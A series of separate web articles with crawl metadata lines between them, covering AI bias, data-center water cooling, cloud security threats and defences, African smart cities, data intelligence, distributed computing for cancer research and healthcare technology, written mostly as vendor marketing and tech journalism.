Diversity is the key to mitigating AI biases – diversity in the datasets and the workforce working day to day with the models. As stated above, we need to have comprehensive, well-rounded datasets that can broadly cover all possible use cases. If there is underrepresented or disproportionate internal data, such as if the AI only has homogenous datasets, then external sources may fill in the gaps in information. This gives the machine a richer pool of data to learn and work with – and leads to predictions that are far more accurate.
Likewise, diversity in the teams working with AI can help mitigate bias. When there is only a small group within one department working on an application, it is easy for the thinking of these individuals to influence the system’s design and algorithms. Starting with a diverse team or introducing others into an existing group can make for a much more holistic solution. A team with varying skills, thinking, approaches and backgrounds is better equipped to recognize existing AI bias and anticipate potential bias.
For example, one bank used AI to automate 80 percent of its financial spreading process for public and private companies. It involved extracting numbers out of documents and formatting them into templates, while logging each step along the way. To train the AI and make sure the system pulled the right data while avoiding bias, the bank relied on a diverse team of experts with data science, customer experience, and credit decisioning expertise. Today, it applies AI to spreading on 45,000 customer accounts across 35 countries.
Consider emerging biases and preemptively train the machine
While AI can introduce biases, proper design (including the data samples and models) and thoughtful usage (such as governance over the AI’s learning) can help reduce and prevent them. And, in many situations, AI can actually minimize bias that would otherwise be present in human decision-making. An objective algorithm can compensate for the natural bias that a human might introduce such in approving a customer for a loan based on their appearance.
In recruiting, an AI program can review job descriptions to eliminate unconscious gender biases by flagging and removing words that may be construed as more masculine or feminine, and replacing them with more neutral terms. It is important to note that a domain expert needs to go in and make sure the changes are still accurate, but the system can recognize things that people could miss.
Bias is an unfortunate reality in today’s AI applications. But by evaluating the data samples and training algorithms and making sure that both are comprehensive and complete, we can mitigate unintended biases. We need to task diverse teams with governing the machines to prevent unwanted outcomes. With the right protocol and measures, we can ensure that AI delivers on its promise and yields the best business results.
Originally appeared in Information Management | <urn:uuid:044bca30-39c6-480e-bd33-dadcb0b5d6c8> | CC-MAIN-2022-40 | https://resources.experfy.com/ai-ml/the-bias-problem-with-artificial-intelligence-and-how-to-solve-it/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00694.warc.gz | en | 0.938363 | 1,212 | 3.765625 | 4 |
Evident improvements can be seen with water cooling technologies. As such, data centers rely on water to cool and sustain operations. Removing heat from IT facilities is a priority. Water is a primary medium that facilitates the cooling exchange in a data facility.
Water management in a data center is a vital variable to ensure operational uptime. With multiple layers of equipment that are sensitive to heat, optimum cooling is necessary. Quality of water compliant to standards are factors that need utmost consideration. Any presence of organic matters and natural sediments in the water used for cooling will affect cooling efficiency. This can, ultimately, give rise to equipment damage and downtime.
Why Is Water A Vital Resource?
Many water sources come from municipal groundwater traditionally. However, the source is a common good that impacts all the other stakeholders benefiting from water. Being party to water extract can be a cause of scarcity and affects community lives. But water supply plays a significant factor in sustaining a data center. The criticality of obtaining water and the means of efficient use highlights the vital need for the resource.
The evolution of data centers has steadily increased in recent years. New hyper-scale data centers are sprouting at a faster rate. The increased number requires further cooling requirements. With more extensive cooling needs, the water supply needs enormous volume. Ultimately, this adds stress to the already depleting local water resources.
The Challenge For Data Centers
Because of constant expansion, new data centers are met with cooling inadequacy. The facilities are left to make do with the current water supply. The combined demand of many data centers cannot be addressed by lone local resources alone.
For many data centers, the future water-cooling integration looks into the water source at the helm. The current challenge is to provide a dedicated water utility supply to data centers. It is to veer away from extracting water that is mainly for public use.
Building new water plants can address this challenge. A wastewater treatment plant is also a sustainable solution to make certain water use is maximized. Other data centers with existing facilities can expand to cater to more considerable supply volume. But building water plants from the ground up would take a longer time. A more extended construction period will hamper the operational run of any existing data center.
Overcoming this issue will need an external solution. These can be external capacities that can be outsourced for the time being. These water supplies can bridge the lack of water while the construction is ongoing. Cooling systems can still run from these supply solutions. Some of these are:
- Mobile Water Treatment Trailers
- Containerized Systems
- Fixed Capital Equipment
The likes of a mobile water treatment trailer can cover the water supply for a definite period. As such, the facility can take the helm while the permanent water plant is made. However, despite the adaptability of these makeup water cooling technologies, long-term water should always take precedent. The accurate mapping of water needs in the initial planning stages will help avoid water supply loss in the process.
Planning For Long-Term Water Technologies
Datacenter development needs long-term water cooling technology. Different water cooling technologies are designed for a particular purpose. The most exact need, however, is necessary as a cooling solution. Because of its crucial role, water cooling technologies should stand the test of time and environmental weathering. Planning to build or upgrade water plants should go through a thorough process to ensure long-running conditions. The planning stages should also consider the facility’s flexibility to adapt to the increasing data center cooling demands.
Initial Water Quality Evaluation
At the outset of any water plant project, water quality should be a prerequisite. Sources of water need proper evaluation and characterization. More often, analysis is only done for water sources that are accessible. Analyzing groundwater requires a comprehensive check for alternate water sources within the site.
The additional water source can serve as an alternate source. It can also contrast water quality from other sources. Selecting the best one would be easier with many options to look into. Water composition is integral in water quality evaluation. The different water sources will elicit different chemical and mineral makeup. A specific focus on these water attributes will negate extra costs in the long run.
All Options Accounted
The water source should not only depend on its natural composition to proclaim that it’s the best. For many water plants, different project requirements come into play.
- Reduced Capital Costs
- Efficient Operation Costs
These variables are considered because water quality is not all about potability. The bigger problem comes when water quality has different natural makeup in terms of hardness or mineral presence, which will increase cooling efficiency. The occurrence of these elements will prove to be detrimental to the water treatment process as a whole.
Advice Of Specialized Experts
The value of water resources will play a big part in a data center’s efficiency. It can affect power usage effectiveness (PUE) and water usage effectiveness (WUE). Manning water operations will need technical know-how to operate it properly.
Specialized experts have valuable experience to uphold data center efficiency. Some data centers will decide to outsource experts on the water landscape. These experts are consultants to determine and address water concerns. These pieces of advice are significant inputs that will preserve water quality.
Optimizing Operational Capacity
Water use is a continuous activity in a cooling process. Because it requires significant volumes, reusing water is more logical. This ensures that water source depletion will not arise. Reusing water requires specialized technologies to do so. A wastewater treatment facility has technological solutions that can effectively reinvigorate water quality. Other strategies include limiting biological growth in water. This requires thorough chemical analysis more than just basic water sampling. These methods are ways to extend the useful life of water.
Shift To An Evaporative Cooling System
Most data centers on the trade-off of water utilization and energy usage are now aiming to reduce energy consumption. They look into reducing power utilization where evaporative cooling systems through water use are effective. The downside, however, is increased water supply.
Lesser Dependency On Local Resource
With competing issues concerning water use with the rest of the community, water reuse technologies negate such disputes. Replacing potable water with treated wastewater reduces the dependency of local data centers on municipal water sources. Hence, the community will have a more significant stake in the resource. On the other hand, the data centers will have lesser water needs and can only avail of the local resource when necessary.
Better Water Facility Monitoring
Water cooling technology is responsible for efficient cooling yields in a data center. As such, water plants are vital facility integration. With an upgrade in the water supply facility, monitoring solutions should also keep pace to ensure optimized sustainability of the whole data center.
Monitoring Water Treatment Facility
A water treatment facility must run 24/7, all days of the year. It is often more extensive and far-reaching than a pumping station; remote monitoring should be adequate. AKCPro server as a control panel connected to the site can check the engine parameters remotely. These parameters include:
- Oil Pressure
- Battery Voltage
- Engine Temperature
- Fuel Level
- Engine Speed
This server provides custom dashboards to display data on generators and sensors installed throughout the water cooling technologies.
AKCP sensors can monitor backup power systems enabling a steady flow of supply to the facility.
- ACKP Wireless Water Distribution Control
- Wireless Tank Level Sensor
Monitor tanks of depths up to 20 meters. Often tanks are located in outdoor or difficult to cable areas. The WT-TDPS is battery powered or can be powered from a 5V DC or 12VDC source. Track fuel usage, graph the tank level, receive alerts when tank levels are critical. No more constraints on maximum cable lengths from the base unit
These smart monitoring technologies help maintain the proper operation runtime of the pumping station.
Vitality Of Water Cooling Technologies In The Future
Water footprint will be embedded in the evolution of data centers. The developments in IoT and artificial intelligence will prime edge computing resources. With this progress, cooling systems need a booster to address heat removal demands. As a significant rise is seen in data centers, valuable progression will also be expected in water cooling technologies. | <urn:uuid:63737123-260b-44e5-957f-48ac2c8b04ab> | CC-MAIN-2022-40 | https://www.akcp.com/articles/improving-water-technologies-to-optimize-data-center/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00694.warc.gz | en | 0.914224 | 1,795 | 3.25 | 3 |
Cloud Computing Threats: Beyond Vulnerabilities
Cloud Computing: Definition, Models, Vulnerabilities and More. Everything you need to know to enhance and protect your business!
When you hear the term cloud computing, know that it has little to do with the famous cloud number 9 some sing about – it is a key concept in the current and future evolution of technology. Like everything else, though, it has its strengths and downsides, so let us have a closer look at some of the most relevant cloud computing threats and vulnerabilities, not without first defining the notion. According to Edwards Zamora,
Cloud computing consists of the set of systems and services working in unison to provide distributed, flexible, and measurable resources to consumers of cloud services. The National Institute of Standards and Technology (NIST) defines cloud computing as a model that consists of on-demand self-service, broad network access, resource pooling, rapid elasticity and measured service (Mell & Grance, 2011). Essentially, cloud computing allows consumers to provision for themselves resources available from a cloud services provider. Consumers are able to access their cloud resources from a wide variety of devices including mobile, thin clients, and traditional desktops. […] Physical and virtual systems are combined to provide consumers with resources dynamically without the user needing to know the details of how it all works.
As i-SCOOP notes:
Cloud computing is also one of the essential enablers of Industry 4.0, has been shaping the software and business applications market for over a decade, has an important place in the development of the Internet of Things and is essential to manage data, including big data, to give just a few examples.
Cloud technology is also used for hosting popular services like e-mail, social media, business applications. The average person checks their phone 221 times per day to look at e-mails, browse the Internet or use smartphone applications. Besides, 82% of large enterprises are now using cloud computing and up to 78% of small businesses are expected to adopt cloud technology in the next few years.
Depending on the delivery methods, the 4 main cloud delivery models are the following:
Public Cloud – owned and operated by a third-party provider, can be used by everyone, so it’s publicly accessible. Examples: Microsoft Azure, Google. Private Cloud – a distinct cloud, whose main key trait is privacy, which can be used in several ways by a specific organization. Hybrid Cloud – a computing environment which combines a public cloud and a private one (or more) by allowing the exchange of data and applications between them. Community Cloud – a cloud used by a community of people with, possibly, shared or common profiles, for a common shared purpose.
Depending on the types of services and resources a customer subscribes to, here are the 3 main cloud services available:
Software as a Service (SaaS). The choice of most businesses, SaaS utilizes the Internet to deliver applications that are managed by a third-party vendor to the users. Many SaaS applications run directly through the web browser, meaning they do not require to be downloaded or installed. SaaS is the best option for: – short-term projects that require quick, easy and affordable collaboration. – startups or small companies that need to launch e-commerce quickly. – applications that need both web and mobile access. – applications that aren’t needed very often. Platform as a Service (PaaS). Cloud platform services deliver a platform that can be modified by developers to create customized applications. PaaS is particularly useful when: – multiple developers are working on the same development project. – other vendors must be included, PaaS providing great speed and flexibility to the whole process. – you need to create customized applications. – you are rapidly developing and deploying an application, because it can reduce costs and simplify challenges. Infrastructure as a Service (IaaS). Cloud infrastructure services are made of highly scalable and automated compute resources. IaaS is self-service for accessing and monitoring computers, networking, storage and so on, allowing businesses to purchase resources on-demand. IaaS is most advantageous: – for small companies or startups, to avoid spending time and money on purchasing and creating hardware and software. – for larger companies, who want to purchase only what they actually consume / need. – for companies who experience rapid growth and want to change out easily specific hardware and software.
Among the benefits of cloud computing we mention:
Cloud computing allows mobile access to your company’s data via various types of devices – smartphones, tablets, laptops, which is particularly useful in the context of the Coronavirus and work from home policy.
B. Easy to scale server resources
Most cloud servers provide access to an intuitive site management dashboard where you can view your site’s performance in real-time. Server resources can be scaled up or down on the spot, without having to wait for your hosting provider’s approval.
C. Safety from server hardware issues and loss prevention
By choosing a cloud service you make sure you avoid any physical server issue like hacking, hardware failure or system overload. We could also include here natural disasters or fires that could destroy your equipment. Most cloud-based services provide data recovery for all kinds of emergency scenarios, from natural disasters to power outages.
D. Faster website speed and performance
Usually, a cloud server should equal whipping speed, which will allow you to increase your site’s capacity, providing you with a great competitive edge.
E. Automatic software updates
Any busy man knows how irritating having to wait for system updates to be installed is. Instead of forcing an IT department to perform a manual, organisation-wide, update, cloud-based applications automatically refresh and update themselves.
If you aim to have a positive impact from an environmental point of view too, bear in mind that by choosing cloud computing you help cut down on paper waste, improve energy efficiency and reduce commuter-related emissions. As I already mentioned, cloud computing can bring amazing benefits to companies, but it also has its downsides. If we want to discuss cloud computing threats and vulnerabilities, though, we must not forget the context of the times we live in. According to Gartner,
The shortage of technical security staff, the rapid migration to cloud computing, regulatory compliance requirements and the unrelenting evolution of threats continue to be the most significant ongoing major security challenges. However, responding to COVID-19 remains the biggest challenge for most security organizations in 2020. “The pandemic, and its resulting changes to the business world, accelerated digitalization of business processes, endpoint mobility and the expansion of cloud computing in most organizations, revealing legacy thinking and technologies,” says Peter Firstbrook, VP Analyst, Gartner.
Here are the main cloud computing threats and vulnerabilities your company needs to be aware of:
1. Lack of Strategy and Architecture for Cloud Security
Many companies become operational long before the security strategies and systems are in place to protect the infrastructure, in their haste to migrate to the cloud.
2. Misconfiguration of Cloud Services
Misconfiguration of cloud services is a growing cloud computing threat you must pay attention to. It is usually caused by keeping the default security and access management settings. If this happens, important data can be publicly exposed, manipulated or deleted.
3. Visibility Loss
Cloud services can be accessed through multiple devices, departments and geographic places. This kind of complexity might cause you to lose sight of who is using your cloud services and what they are accessing, uploading or downloading.
4. Compliance Violation
In most cases, compliance regulations require your company to know where your data is, who has access to it, how it is processed and protected. Even your cloud provider can be asked to hold certain compliance credentials. Thus, a careless transfer of your data to the cloud or moving to the wrong provider can bring potentially serious legal and financial repercussions.
5. Contractual Breaches
Any contractual partnerships you have or will develop will include some restrictions on how any shared data is used, how it is stored and who has authorized access to it. Unknowingly moving restricted data into a cloud service whose providers include the right to share any data uploaded into their infrastructure could create a breach of contract, which could lead to legal actions.
6. Insecure Application User Interface (API)
Operating systems in a cloud infrastructure is sometimes done through an API that helps to implement control. API’s are sets of programming codes that enable data transmission between one software product and another and contains the terms of this data exchange. Application Programming Interfaces (API) have two components: technical specification describing the data exchange options, in the form of a request for processing and data delivery protocols, and the software interface written to the specification that represents it.
Any API can be accessed internally by your staff and externally by consumers – the external-facing API can represent a cloud computing threat. Any insecure external API might become a gateway for unauthorized access to cybercriminals who might steal data and manipulate services.
7. Insider Threats
Your employees, contractors and business partners can, without having any malicious intent, become some of your biggest security risks due to a lack of training and negligence, as we have already shown. Moving to the cloud introduces a new layer of insider threat, from the cloud service provider’s employees. Since it is clear, although there are so many threats and vulnerabilities, that cloud computing could be really helpful to any company if used correctly and that it is here to stay, let us now mention some of the safety measures you can take.
Here’s what you can do to efficiently combat cloud computing threats and vulnerabilities:
1. Manage User Access
Not every employee needs access to every application, file or bit of information. By setting proper levels of authorization you make sure that everyone gets to view or manipulate only the data and the applications necessary for them to do their job.
2. Deploy Multi-Factor Authentication
Stolen credentials are one of the most common methods hackers use to get access to your company’s online data. Protect it by deploying multi-factor authentication and make sure that only authorized personnel can log in and access data.
3. Detect Intruders with Automated Solutions that Monitor and Analyze User Activity
Abnormal activities can indicate a breach in your system, so try using automated solutions that can help you spot irregularities by monitoring and analyzing user activities in real-time. This is a very efficient tool in the combat against cloud computing threats and vulnerabilities.
4. Consider Cloud to Cloud Back-Up Solutions
The chances of losing data because of your cloud provider’s mistake are pretty low – unlike losing them due to human error. Check with your cloud provider for how long they store deleted data, if there are any fees to restore it or turn to a cloud to cloud back-up solution.
5. Provide Anti-Phishing Training for Employees
The Heimdal™ Security team is very fond of education – we really believe that knowledge is power and that many things can be confronted if we know about them and try our best to prevent them. It goes without saying that we recommend you to discuss with all your employees about the dangers of phishing. (We actually wrote more about this here, here and here.)
6. Develop an Off-Boarding Process to Protect against Departing Employees
Always make sure that the employees that leave your company can no longer access your systems, data or customer information by revoking all the access rights. You can manage this internally or outsource the task to someone who knows how to implement the process.
Heimdal™ Security can also help. Here’s how!
In our opinion, you can choose between 3 approaches – or opt for all of them if you want top cybersecurity for your company: Manage user access with Heimdal™ Privileged Access Management, our Privileged Access Management (PAM) software which helps your organization achieve not just better cybersecurity, but also full compliance and higher productivity. Heimdal™ Privileged Access Management will allow your system admins to approve or deny user requests from anywhere or set up an automated flow from the centralized dashboard. Moreover, all the activities will be logged for a full audit trail.
Heimdal® Privileged Access
Heimdal® Email Security | <urn:uuid:6493cb19-7ff0-493c-b189-1f8f1ef4f366> | CC-MAIN-2022-40 | https://heimdalsecurity.com/blog/cloud-computing-threats/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00694.warc.gz | en | 0.933953 | 2,548 | 2.828125 | 3 |
Public administration officials and technology leaders have been advocating for the concept of smart cities — which use technology such as IoT, AI and 5G for cost-efficient service delivery — as an answer to issues raised by Africa’s burgeoning population and increasing urbanization.
Projects to build smart cities from the ground up take years to complete however, and some experts have been advocating for a more modular approach, calling for the incorporation of emerging technology into existing urban infrastructure.
What are smart cities?
Smart cities integrate components such as sensors with IoT networks and information and operational technology to monitor and control infrastructure, devices and the flow of data, with the overall goal of improving the standard of living for residents. Superfast 5G is used to connect components wirelessly, and AI applications are often used to monitor and control networks, and do predictive maintenance.
Big greenfield projects such as Konza Technopolis, in Kenya, and Lanseria Smart City, in South Africa, are moving ahead. As emerging technology is being deployed throughout Africa and becoming more readily available, though, there is a growing debate about whether more focus should be placed on modernising existing communities.
Greenfield smart city projects require massive investments. Konza Technopolis, for example, is estimated to have nearly US$1 billion in building costs for the government, and carry a total price tag of $14.5 billion including investments from third parties. The project, a 5,000-acre development 64 km south of Nairobi adjacent to Konza City, is still on course, and includes the Tier III Konza National Data Center.
The main aim of Konza Technopolis is to generate local innovation and attract international, innovative companies to develop solutions for Kenya. Konza has already forged agreements with foreign technology companies and research institutions to establish themselves at the technopolis.
Smart cities offer data-driven services
In its completion, Konza Technopolis will offer data-driven services. For example, roadway sensors will be able to monitor pedestrian and automobile traffic and adjust traffic-light timing accordingly to optimize traffic flows and issue emergency warnings. Energy and water consumption will be closely monitored.
The idea behind constructing Konza Technopolis as a greenfield project from the ground up was to assure an advanced development from the onset, according to Eng. John Tanui, CEO of Konza Technopolis Development Authority, the semi-autonomous governent agency in charge of overseeing the smart city’s development.
“Even in advanced economies, in terms of creating a new economic drive, at times you have to go to a greenfield approach,” he said, giving the example of Research Triangle Patk in North Carolina, U.S., which was established as a research community.
A range of urban planners and technology leaders, however, are suggesting different approaches for Africa.
Emerging tech benefits existing communities
World Mobile, a mobile communications network provider, aims to bring the smart city concept to existing communities, using emerging technology such as solar power and a blockchain-based payment and funding system to bring connectivity to underserved regions.
World Mobile’s applications and services are targeted at the nearly 4 billion people globally who are still unconnected to communications networks.
The company has created what it calls “smart villages” that have helped businesses grow while enhancing the lives of people.
Its project in Tanzania has connected universities, schools, and remote villages, providing them with connectivity and power, said Micky Watkins, CEO of World Mobile. Its business model builds on existing infrastructure and does not aim to interrupt the lifestyle of local residents.
“Africa has the opportunity to leapfrog the rest of the world into the 4th industrial revolution,” Watkins said, referring to the concept of a convergence of emerging technologies expected to supercharge economic growth. “Africa cannot and should not wait for 5G to build smart cities. There are already enough unlicensed spectrums for IoT to make communications more affordable and efficient.”
Hugues Parant, the CEO of the Euroméditerranée urban development agency, offers a similar view on how Africa can build smart cities, based on his own experience. The agency is working to make Aix-Marseille-Provence — a group of cities and towns in France — a smart, connected and sustainable community. It is one of the biggest urban development projects in Europe.
“To answer the gigantic urban development needs, many African countries have decided to literally build brand new cities, sometimes 50 kilometres from capitals,” Parant said. However, this has only magnified the issues that the old infrastructures face, he said.
“A city will be smart if it can adapt to all types of populations instead of excluding some,” Parant said.
Major vendors tend to agree.
“Don’t try to build everything from scratch. Bring in the technology platforms that allow you to build what matters most for specific urban populations,” said Sanjay Brahmawar, CEO of Software AG.
The company has recently participated in projects in Riyadh and Dubai to do exactly that: establish a foundation, using its Cumulocity IoT integration platform, upon which smart city services can be built.
Brahmawar said that empowering these existing cities with technology — in particular IoT and analytics — can help to manage services including water, power and healthcare, making them more accessible and more affordable.
“This is how a project can remain focused on citizen, business and investor services — the priorities — and not get slowed down by technology development,” Brahmawar added.
Parant contends that Africa has all it takes to create smart cities within the existing infrastructure. His advice to innovation leaders is to have cities inspired by their history, traditions and local cultures. They should be designed by their residents and use technologies adapted to them.
Rwanda’s smart city master plan follows this ideology. The government sets policies and guidelines that towns and city leaders can adopt to make their existing developments ‘smart’.
A hybrid approach for African smart cities is likely
Ultimately, a mix of approaches to the smart city concept is likely to prevail.
Even though Konza Technopolis CEO Tanui oversees a massive greenfield project, he also agreed that revitalizing existing cities is another way to bring smart city services to Africa. As part of his early work as deputy country CEO and vice president of Huawei Technologies, he worked in several cities in Africa to bring applications such as smart video cameras to municipalities.
However, most African countries need to create new urban settlements and coupling them with smart solutions kills two birds with one stone, he said.
“If you check the global urbanization rate, Africa is the one [region] urbanizing at the highest rate. There is no shortcut: We must create new urban developments to accommodate the new urban population,” he said. | <urn:uuid:e1aab510-e1ac-4aba-8eb9-52eba22fdbf4> | CC-MAIN-2022-40 | https://www.cio.com/article/188906/why-tech-leaders-are-rethinking-the-smart-city-concept-for-africa.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00094.warc.gz | en | 0.948264 | 1,419 | 3.3125 | 3 |
With the advent of available technologies such as big data, artificial intelligence (AI) and machine learning have been moving towards an unforeseen evolution. Smart machines are no longer operating on synthetic data, but use in-field ‘true’ data, which not only enhances their capability for better human interaction but also signals towards many more future possibilities. Data Intelligence is one such development that can contribute to these tools significantly.
Data Intelligence is the combination of AI and machine learning (ML) and is the promise of a prolific tomorrow. With cloud-based storage featuring massive sizes and speeds, data intelligence signals a coming of optimal fusion. Technology is becoming better every day, especially with regards to efficiency, and amid this stream, data intelligence does not seem to be a pick of disappointment.
The Base Foundation For Data Intelligence
With optimized data awareness, data intelligence offers a rather unconventional 360-degree view of the business environment which enfolds within both customer and organization centered data analysis. With proper knowledge of both ends, business will flourish.
Data intelligence has several components that involve a set of techniques each:
Descriptive: For reviewing and examining the data to understand and analyze business performance.
Prescriptive: For developing and analyzing alternative knowledge that can be applied in the courses of action
Diagnostic: For determining the possible causes of particulate occurrences.
Predictive: For analyzing historical data to determine future occurrences.
Decisive: For measuring the data adequacy and recommending future actions to be undertaken in an environment of multiple possibilities.
Data intelligence is moving towards becoming one of the primary facets of big data. From a quick infantile stage, data intelligence has reached a certain level which promises smart conduction of massive data. It is not going to contract its wings either; the immediate favorable results have attracted eyes of many firms. Even various entrepreneurs have been showing interest in making use of and developing Data Intelligence further.
Having stated the potential of Data Intelligence, let us elaborate upon the various benefits of data intelligence and why a firm should embrace them:
The business nowadays is continuously on the verge of change. Any organization must accept and propagate newly emerging trends, failing to do so may result in a decrement in popularity. Take, for example, smartphones with selfie cameras in India. Mobile companies that don’t fan up the trend are dwelling into an utter loss. With the help of data intelligence, these organizations become immune to ignorance of change. The smart adaptive dynamics inform the firms about recurrent changes and what pattern of occurrence they are following. Based on the analysis, it enables the organization to make informed decisions.
Stronger Foundations of Data
Data intelligence (DI) works towards strengthening existing big data through restructuring the mechanism of data arrangement. AI needs to dwell on data extensively, and therefore, it becomes vital to enhance the data AI is going to use. With reliable data foundations, DI transforms big data into insights and then renders an optimized engagement capability involving the active agents; these include BI strategists, intelligent BI analysts, data intelligence warehouse architects, data scientists, implementation and development experts, whom all contribute towards making a stronger base for the data.
Data intelligence also takes charge of metamorphosing raw chunks of data into a cumulative knowledge – it is akin to a “concept formation” for computer systems. Machines that usually intake data do it regardless of shunning the bad and choosing the good. With Data intelligence, information is cleansed and transformed into smart capsules of readymade information that are used within the business to measure performance, besides incorporating contextual data sources to enrich the information management. With Data intelligence, organizations need not worry about defining particular cases to the machines. Data intelligence collectively feeds the deduced “knowledge” into the operation area where final processing is carried out.
Developing Augmented Analytics
Data intelligence incorporates advanced analytic techniques to advance visualized predictive and prescriptive analytics. A scenario might be to augment instead of building a full application, beforehand. Based on the outcomes, further improvements can be proposed if necessary. With such preparation for an actual scenario, there remains a null scope of failure in business strategies. The advanced simulations enable the firms to foresee the possible outcomes and reform the prescriptions wherever necessary.
In conclusion, data intelligence is emerging to be a modern tool that will become a prerequisite to any successful business. With enhanced features such as adaptive dynamics, data transformation, and augmented analysis, data intelligence lays a foundation for the smooth and beneficial functioning of companies. If carried out aptly, it can yield extraordinary profits on investment through increased gain and simplifying business strategies. | <urn:uuid:9d6a6d9a-eaf4-4e1d-94ab-47428e9713e5> | CC-MAIN-2022-40 | https://www.idexcel.com/blog/tag/big-data-business-intelligence/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00094.warc.gz | en | 0.913025 | 936 | 2.78125 | 3 |
Thanks to 1.5 million volunteers who left their computers running when not in use and a little help from Big Blue, cancer researchers have announced significant progress in looking for new potential drugs in cancer treatment.
The Help Conquer Cancer Project worked with the IBM-supported World Community Grid to send out protein samples for simulation testing on all of the computers. The program, running in the background of the volunteers’ computers and harnessing unused compute cycles, simulated a process called crystallization, where proteins crystallize into a solid form.
In this form, the proteins can be further examined by special X-ray to see how they interact with cancer, and whether or not those proteins may cause the disease.
Using the World Community Grid to send out sample after sample to the volunteers, the Help Conquer Cancer Project believes it was able to determine six times as many images per protein for further testing in significantly less time than would be possible under manual human review.
By way of example, if a person looked at one image per second without rest — which is not humanly possible — it would take 1,333 days to examine all 12,500 proteins in the study. The World Community Grid did that in a fraction of the time, said Dr. Joseph Jasinski, an IBM distinguished engineer and program director of IBM’s Health Care and Life Sciences Institute.
“The World Community Grid is really good at running embarrassingly parallel computation, where you do the same task over and over again. So it’s set up for doing many possibilities to try where you want to throw away the ones that are no good quickly,” Jasinski told InternetNews.com.
Something like testing for cancer drugs works with a setup like the World Community Grid. The 1.5 million machines work independently and don’t communicate with each, hence Jasinski’s description of them as “embarrassingly parallel.” They perform the same repetitive task over and over — in this case, testing a protein to see its potential in cancer treatment.
An increasing number of firms are turning to this solution for their own large-scale computing tasks, but they are keeping the process inside the firewall. Distributed computing lends itself well to a “loosely coupled” task like searching through a vast amount of data for a match, Jasinski said.
In a “tightly coupled” scenario, where the program might need the results of one step in order to continue, or processors need to communicate, a company would be better off using IBM’s BlueGene servers, where high-speed interconnects enable interprocessor communication, Jasinski said.
IBM consulting helps firms determine whether their computation needs are loosely coupled or tightly coupled, and offers the appropriate solution. Some companies are using loosely coupled computing internally, Jasinski said.
IBM has its own technology and services through its Smarter Planet initiative to help these firms build internal distributed computing systems. Companies like financial, life science and drug research firms put an agent on employee computers and request they leave their computer running at the end of the day, he said.
“We have helped companies and institutions set these things up. It’s part of a growing trend around distributed computing, a sort of precursor to cloud computing in a sense, so I think that general trend of trying to harness the horsepower you have and get as much productivity from the infrastructure you have is going to continue,” Jasinski said.
“We have a good and growing list of problems people are applying this technology toward, typically in energy, the environment, health care and life sciences. We’ve also tried to get some stuff going in computational aspects of humanities research,” he added.
The World Community Grid launched in 2004 and is the world’s largest public scientific research computer network, with 514,000 members offering 1.5 million devices, meaning many people are running more than just their own personal computer.
It runs other tests similar to the Help Conquer Cancer Project, like [email protected], which looks for a cure for HIV, plus programs to fight influenza, muscular dystrophy, human protein folding and research efforts in the field of clean energy.
Andy Patrizio is a senior editor at InternetNews.com, the news service of Internet.com, the network for technology professionals. | <urn:uuid:03421291-b6ea-4419-b9a0-12e076f6b06c> | CC-MAIN-2022-40 | https://cioupdate.com/ibm-volunteers-help-locate-anti-cancer-drugs/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00094.warc.gz | en | 0.942201 | 892 | 2.828125 | 3 |
The reach of technology innovation in healthcare is getting crazy.
Technology is evolving. Technology is creating more processes. Technology is gathering more and more data. Technology is creating security risks. Technology is replacing conventional monitoring and recording systems. Technology is driving the adopting of devices like smartphones and tablets.
With all these advancements, we created a list of the top 5 technology advancements in healthcare that all IT professionals in healthcare should be aware of.
Mobile health is removing the limitations of mobility inside of clinics and hospitals. Not all, but many healthcare devices are wireless, enabling physicians and patients alike to check on healthcare progress, while on the go. Smartphones and tablets allow healthcare providers to freely access and send information, while healthcare apps like epocrates help doctors and nurses better serve patients. Mobile devices are great tools for orders, reviewing documentation, and interacting with patients.
mHealth isn’t about wireless connectivity, only. It’s become a tool that allows patients to have more control and ownership of their overall health. mHealth allows patients to review their weight, blood pressure, wireless, and even take measurement like an EKG, and simply input data put into a smartphone while transferring to a healthcare professional.
It’s not without risks. IT staff that work in healthcare need to be extra diligent in ensuring their facility is compliant, while keeping patient data secure. There are, as evidence by this post, technology advancements in healthcare specifically geared toward both security and accessibility.
Studies consistently show the benefits of telemedicine in rural markets. For patients that ultimately need help, but don’t live close to a healthcare campus, concepts like telemedicine allow providers to offer medical service while being hundreds of miles apart.
The cost benefits of telemedicine cannot be ignored, either. When patients can receive care, through a video chat with a physician, claims are typically lower as clinical fees are reduced because of the elimination of traditional office costs.
Patients are owning their healthcare with data, and portal technology is helping them accomplish this. Portal technology allows patients to access their medical records, online. This type of technology puts the patient in the driver seat as it allows them to become more involved and better educated about their healthcare. Portal technology gives patients a sense of empowerment and responsibility that they’ve not had prior. For IT professionals managing this, challenges will arise, like compliance and security. Any IT provider, or outsourced IT firm, needs to have a documented process, to overcome and prepare for any pitfalls associated with accessing data online, via a portal.
Similar to portal technology, self-service kiosks can help expedite processes like checking in through the hospital registration system. Self-service helps with staffing costs, as it reduces payroll, and self-service helps the patient to validate information that otherwise might be incorrect. Some automated kiosks can even assist patients with paying co-pays, signing paperwork and other registration requirements. That said, hospitals should be cautious when implementing these kiosks as to not lose a high level of customer service. Interacting with patients is still important and should never be completely eliminated.
Remote monitoring tools.
Monitoring patients’ health at home can reduce costs and unnecessary visits to an M.D.’s office. For example, someone that has cardiac issues, with a pacemaker, automatically transmits data to a remote center. If there’s something wrong with the data, the patient can be immediately contacted by their doctor or medical staff. Remote monitoring gives patients peace of mind they never had before by allowing other people to monitor your health for you.
Cooperative Systems supports technology for the healthcare industry.
We have over twenty years of experience in healthcare. Our process helps make your life easier.
